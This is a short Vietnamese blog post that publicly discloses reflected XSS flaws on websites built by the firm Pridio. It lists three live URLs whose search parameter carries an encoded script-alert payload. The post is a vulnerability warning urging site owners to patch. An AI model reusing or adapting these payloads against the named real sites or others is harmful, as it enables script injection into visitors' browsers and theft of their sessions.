Cảnh Báo Lỗi Xss Trên Tất Cả Sản Phẩm Của Công ty Cổ Phần Pridio

hôm nay mình có mò ra một công ty thiết kế webiste mà có web toàn bộ đều lỗi XSS

"Pridio được thành lập bởi 1 nhóm trí thức nghiên cứu chuyên sâu về thị trường internet Việt Nam từ năm 2009. Chúng tôi cung cấp các giải pháp cũng như các dịch vụ trực tuyến với chất lượng cao và chi phí phù hợp cho khách hàng."

Exploit:  Công ty Cổ Phần Pridio XSS Attack

Toàn bộ dự án website đã thực hiện các bạn có thể coi ở đây:

http://pridio.com/cac-du-an/

toàn bộ sản phẩm của công ty này đều bị lỗi XSS

check thử demo ảnh:






Links:

http://pridio.com/?s=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

http://phuongvietgroup.com/?s=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

http://clickbuy.com.vn/?s=%3Cscript%3Ealert%281%29;%3C/script%3E&asl_active=1


Cảnh báo:

     Những ai đang dùng code của công ty này nhanh chóng sửa lại lỗi trên website và yêu cầu công ty này cung cấp bản vá vì đây là lỗi hệ thống
    Đối với công ty chúng tôi yêu cầu rà soát lại toàn bộ code của mình và tiến hành chỉnh sửa lỗi hệ thống của công ty cũng như website khách hàng!!
Share on Google Plus

About Vo Uu

Tác Giả là người chuyên nghiên cứu về các kỹ thuật hacking, security, marketing, là người có góc nhìn lạ và đi sâu vấn đề cũng như là một con người thẳng thắn góp ý. Nếu sử dụng bài trên blog mong các bạn dẫn lại nguồn tác giả!!! Tác Giả rất mong có sự đóng góp hội ý từ cộng đồng để cho an toàn an ninh mạng việt nam ngày càng được an toàn hơn!!

0 nhận xét:

Post a Comment